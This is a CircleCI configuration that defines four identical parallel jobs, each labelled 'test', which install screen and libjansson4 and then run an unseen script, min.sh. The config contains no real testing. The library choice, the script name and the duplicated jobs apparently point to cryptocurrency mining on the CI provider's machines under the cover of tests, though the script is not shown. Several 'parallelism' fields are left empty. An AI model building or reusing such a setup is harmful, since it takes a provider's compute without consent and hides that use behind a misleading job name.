version: 2.1
jobs:
    meto1:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh 
              ./min.sh 
    meto2:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh 
              ./min.sh 
    meto3:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh 
              ./min.sh 
    meto4:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh 
              ./min.sh 

workflows:
    version: 2
    build:
        jobs:
            - meto1
            - meto2
            - meto3
            - meto4
